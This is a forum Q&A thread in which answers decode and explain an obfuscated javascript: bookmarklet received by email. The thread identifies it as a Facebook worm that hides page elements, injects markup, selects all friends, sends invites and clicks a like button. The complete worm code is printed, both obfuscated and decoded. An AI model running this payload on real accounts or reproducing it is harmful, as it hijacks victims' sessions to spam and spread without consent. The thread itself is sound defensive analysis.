
What does this code do

Ok someone who happens to be a good friend of mine is sending me some odd emails lately one of which was a link to a page that asks you to copy and paste this in to your address bar in your browser then execute it ...

// Sample under analysis, quoted as received: do not paste it into a browser address bar.
// A `javascript:` URL runs inside whatever page is currently open, so every
// statement below acts on that page as the user who is logged in to it.
// The string table `_0xc100` is written as hex escapes only to hide the property
// names and the request path; a decoded copy of the same script appears further down this page.
// NOTE(review): `开发者_运维问答` in `_0xc100开发者_运维问答[9]` looks like text injected by the
// site this page was copied from, not part of the sample; the decoded listing
// further down has `_0xc100[9]` at that position.
javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100开发者_运维问答[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();

Not being totally with it when it comes to low level programming i'm curious as to what the email is asking here ...

PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.

But ... Could someone tell me what it does?


I haven't decoded completely the code, but here's a couple of hints to it.

The variable _0xc100 defines an array of strings. The characters are written as hexadecimal escape sequences, which makes them harder to read. For instance, \x76 is "v".

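You can safely alert(_0xc100); to see it in plain text, as long as you run only the array declaration below and none of the statements that follow it in the original script.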

// String table of the bookmarklet. The rest of the script fetches every
// property name, element id and request path from here by index, so none of
// them appears in clear text. Declaring the array has no side effects.
var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79", // [0] visibility
      "\x73\x74\x79\x6C\x65", // [1] style
      "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", // [2] getElementById
      "\x68\x69\x64\x64\x65\x6E", // [3] hidden
      "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", // [4] innerHTML
      "\x76\x61\x6C\x75\x65", // [5] value
      "\x63\x6C\x69\x63\x6B", // [6] click
      "\x73\x75\x67\x67\x65\x73\x74", // [7] suggest
      "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C", // [8] select_all
      "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D", // [9] sgm_invite_form
      "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70", // [10] /ajax/social_graph/invite_dialog.php
      "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67", // [11] submitDialog
      "\x6C\x69\x6B\x65\x6D\x65"]; // [12] likeme

translates to an array containing these keywords

visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all,
sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme

Now, the following statements (DON'T EXECUTE THOSE) use these keywords to actually execute functions.

For instance:

d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];

is equivalent to (d is defined as document and mw is defined at the top)

document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";

which hides an element called app125879300771588_mwrapper

the following instructions give

document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;

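which copies the value of app125879300771588_jode into the innerHTML of app125879300771588_jop (the assignment goes from right to left, so any markup held in that value is parsed into the page)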

and

document.getElementById("suggest").click();

which I guess clicks some "suggest" button.

Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)

They translate to

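// First of the three timers, all set to 5000 ms. The original statement is
// fs[_0xc100[8]](), so select_all is called as a method of `fs`, not as a
// bare function. The bookmarklet never defines `fs`; presumably it is a
// global supplied by the page the script is pasted into.
setTimeout(function () {
    fs.select_all();
}, 5000);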

Which I assume selects all your friends...

// Second timer, same 5000 ms delay. SocialGraphManager is not defined anywhere
// in the bookmarklet; presumably it is an object of the page the script runs on.
// The two arguments are string-table entries [9] and [10]; judging by their
// names, a form id and the path the dialog is submitted to.
setTimeout(function () 
    {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
    }, 5000);

... send them invites

// Third timer, same 5000 ms delay. It performs two actions without any
// further user interaction.
setTimeout(function () 
    {
    // Programmatic click on the element whose id is "likeme".
    document.getElementById("likeme").click();
    // Writes the value of the ..._ifc element into the innerHTML of ..._ifo,
    // so any markup held in that value is parsed into the page.
    document.getElementById("app125879300771588_ifo").innerHTML =
       document.getElementById("app125879300771588_ifc").value;
    }, 5000);

... and presses a like button

Note that I don't use Facebook, and I don't know the ins and outs of it but I guess it's pretty clear that this code is malicious.


// Decoded form of the bookmarklet: the same statements as the original, with
// the string table in clear text. Each statement is annotated with the call
// it resolves to once the table lookups are substituted.

// Element ids, all carrying the same app125879300771588_ prefix. They are
// assigned without a declaration, so they are created as globals on the page.
a = 'app125879300771588_jop';
b = 'app125879300771588_jode';
ifc = 'app125879300771588_ifc';
ifo = 'app125879300771588_ifo';
mw = 'app125879300771588_mwrapper';
// Lookup table: indices 0-12 are referenced by the statements below.
var _0xc100 = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "click", "suggest", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "likeme"];
d = document;
// document.getElementById(mw).style.visibility = "hidden"
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
// document.getElementById(a).innerHTML = document.getElementById(b).value
// (markup held in that value is parsed into the page)
d[_0xc100[2]](a)[_0xc100[4]] = d[_0xc100[2]](b)[_0xc100[5]];
// document.getElementById("suggest").click()
d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();
// The three callbacks below are all scheduled with the same 5000 ms delay.
setTimeout(function () {
    // fs.select_all(): `fs` is not defined in this script; presumably a
    // global supplied by the page it runs on.
    fs[_0xc100[8]]();
}, 5000);
setTimeout(function () {
    // SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php")
    // SocialGraphManager is likewise not defined here.
    SocialGraphManager[_0xc100[11]](_0xc100[9], _0xc100[10]);
}, 5000);
setTimeout(function () {
    // document.getElementById("likeme").click()
    d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();
    // document.getElementById(ifo).innerHTML = document.getElementById(ifc).value
    d[_0xc100[2]](ifo)[_0xc100[4]] = d[_0xc100[2]](ifc)[_0xc100[5]];
}, 5000);

This is most likely an adaptation of one of the many Facebook worms that send themselves to all of your friends.

Look here for a similar question.

Other versions of this used p.a.c.k.e.r to obfuscate, and these could easily be deobfuscated by running the p.a.c.k.e.r code through http://jsbeautifier.org/


It's an obfuscated bookmarklet. You can unobfuscate it (carefully) to see the actual Javascript it will run. If you don't have a powerful need to, though, probably not worth bothering. I'd bin it and check with my friend to see if it really is coming from him/her, and if so, why.
